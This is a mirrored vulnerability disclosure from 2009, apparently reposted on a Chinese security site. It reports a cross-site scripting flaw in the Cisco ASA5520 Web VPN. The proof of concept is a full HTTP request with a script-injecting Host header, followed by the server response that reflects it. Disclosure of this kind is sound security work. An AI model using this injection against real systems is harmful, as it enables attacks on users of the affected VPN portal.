首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
The Cisco ASA5520 Web VPN suffers from a cross site scripting vulnerability via
来源:bugsnothugs[at]gmail.com 作者:BugsNotHugs 发布时间:2009-04-01  

- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!--
  Copyright (c) 2004, 2005 by Cisco Systems, Inc.
  All rights reserved.
 -->
<head>


<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North
America Server" for
"http://"'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>

<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>


- Solution

None

- Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)

--

BugsNotHugs
Shared Vulnerability Disclosure Account


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PrecisionID Datamatrix ActiveX
·DeepBurner 1.9.0.228 Stack Buf
·VirtueMart <= 1.1.2 Multiple R
·Oracle WebLogic IIS connector
·VirtueMart <= 1.1.2 Remote SQL
·XBMC 8.10 (GET Requests) Multi
·Safari 3.2.2/4b (nested elemen
·XBMC 8.10 (Get Request) Remote
·Podcast Generator <= 1.1 Remot
·XBMC 8.10 (Get Request) Remote
·XBMC 8.10 (takescreenshot) Rem
·Trend Micro Internet Security
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved